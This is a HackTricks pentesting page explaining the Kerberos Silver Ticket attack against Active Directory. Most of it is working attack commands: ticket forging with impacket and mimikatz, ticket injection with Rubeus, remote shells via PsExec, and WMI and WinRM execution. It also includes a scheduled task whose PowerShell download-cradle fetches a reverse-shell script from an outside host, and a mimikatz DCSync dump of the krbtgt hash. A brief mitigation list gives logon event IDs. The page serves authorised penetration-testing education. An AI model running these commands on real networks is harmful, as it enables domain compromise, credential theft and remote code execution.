HackTricks
Search…
Pentesting
Powered By GitBook
Silver Ticket

Silver ticket

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user.
In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default.
It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256). To know how to generate an AES key read: section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1.
Linux
1
python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus
2
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
3
python psexec.py jurassic.park/[email protected] -k -no-pass
Copied!
In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec.
Windows
1
#Create the ticket
2
mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
3
#Inject in memory using mimikatz or Rubeus
4
mimikatz.exe "kerberos::ptt ticket.kirbi"
5
.\Rubeus.exe ptt /ticket:ticket.kirbi
6
#Obtain a shell
7
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
Copied!
The CIFS service is the one that allows you to access the file system of the victim. You can find other services here: https://adsecurity.org/?page_id=183. For example, you can use the HOST service to create a schtask in a computer. Then you can check if this has worked trying to list the tasks of the victim: schtasks /S <hostname> or you can use the HOST and RPCSS service to execute WMI queries in a computer, test it doing: Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>

Mitigation

Silver ticket events ID (more stealth than golden ticket):
    4624: Account Logon
    4634: Account Logoff
    4672: Admin Logon

Available Services

Service Type
Service Silver Tickets
WMI
HOST
RPCSS
PowerShell Remoting
HOST
HTTP
Depending on OS also:
WSMAN
RPCSS
WinRM
HOST
HTTP
In some occasions you can just ask for: WINRM
Scheduled Tasks
HOST
Windows File Share, also psexec
CIFS
LDAP operations, included DCSync
LDAP
Windows Remote Server Administration Tools
RPCSS
LDAP
CIFS
Golden Tickets
krbtgt
Using Rubeus you may ask for all these tickets using the parameter:
    /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to ay part of the remote filesystem just doing something like:
1
dir \\vulnerable.computer\C$
2
dir \\vulnerable.computer\ADMIN$
3
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
Copied!
You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:

HOST

With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:
1
#Check you have permissions to use schtasks over a remote server
2
schtasks /S some.vuln.pc
3
#Create scheduled task, first for exe execution, second for powershell reverse shell download
4
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
5
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
6
#Check it was successfully created
7
schtasks /query /S some.vuln.pc
8
#Run created schtask now
9
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
Copied!

HOST + RPCSS

With these tickets you can execute WMI in the victim system:
1
#Check you have enough privileges
2
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
3
#Execute code
4
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
5
6
#You can also use wmic
7
wmic remote.computer.local list full /format:list
Copied!
Find more information about wmiexec in the following page:

HOST + WSMAN (WINRM)

With winrm access over a computer you can access it and even get a PowerShell:
1
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
Copied!
Check the following page to learn more ways to connect with a remote host using winrm:
Note that winrm must be active and listening on the remote computer to access it.

LDAP

With this privilege you can dump the DC database using DCSync:
1
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
Copied!
Learn more about DCSync in the following page:
Last modified 2mo ago